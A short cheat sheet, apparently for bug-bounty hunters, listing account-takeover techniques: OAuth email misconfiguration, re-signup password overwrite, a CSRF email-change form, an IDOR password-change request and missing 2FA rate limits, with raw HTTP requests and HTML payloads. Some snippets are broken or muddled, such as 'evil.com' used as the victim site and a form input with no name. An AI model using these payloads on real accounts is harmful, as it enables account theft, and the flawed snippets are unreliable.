Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else.
-
Using OAuth Misconfiguration
- Victim has a account in evil.com
- Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
- Attacker changed his/her email to victim email.
- When the victim try to create an account on evil.com, it says the email already exists.
-
Try re-sign up using same email
POST /newaccount HTTP/1.1 ... email=victim@mail.com&password=1234After sign up using victim email, try signup again but using different password
POST /newaccount HTTP/1.1 ... email=victim@mail.com&password=hacked -
via CSRF
- Create an account as an attacker and fill all the form, check your info in the Account Detail.
- Change the email and capture the request, then created a CSRF Exploit.
- The CSRF Exploit looks like as given below. I have replaced the email value to anyemail@*******.com and submitted a request in the victim’s account.
<html> <body> <form action="https://evil.com/user/change-email" method="POST"> <input type="hidden" value="victim@gmail.com"/> <input type="submit" value="Submit Request"> </form> </body> </html>
-
Chaining with IDOR, for example
POST /changepassword.php HTTP/1.1 Host: site.com ... userid=500&password=heked123500 is an attacker ID and 501 is a victim ID, so we change the userid from attacker to victim ID
-
No Rate Limit on 2FA
References: